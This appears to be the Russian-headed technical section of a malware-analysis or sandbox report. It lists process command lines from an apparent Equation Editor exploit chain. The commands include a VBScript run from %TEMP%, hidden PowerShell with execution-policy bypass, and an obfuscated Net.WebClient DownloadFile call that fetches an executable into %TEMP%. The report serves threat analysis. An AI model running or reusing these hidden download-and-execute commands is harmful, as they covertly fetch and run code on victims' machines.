Техническая информация
- '%WINDIR%\syswow64\cscript.exe' %TEMP%\Putty.vbs AC
- '%WINDIR%\syswow64\cmd.exe' /C cscript %tmp%\Putty.vbs AC
- %TEMP%\putty.vbs
- %TEMP%\putty.vbs
- '%WINDIR%\syswow64\cmd.exe' /C cscript %tmp%\Putty.vbs AC' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit CmD.exe /C Powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -noexit -command (New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,70,105,108,101)).('=nvo/e...' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit CmD.exe /C Powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -noexit -command (New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,70,105,108,101)).('=nvo/e...
- '%WINDIR%\syswow64\cmd.exe' /C Powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -noexit -command "System.Object Invoke(Params System.Object[] arguments)" https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command "System.Object Invoke(Params System.Object[] arguments)" https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe %TEMP%\\putty.exe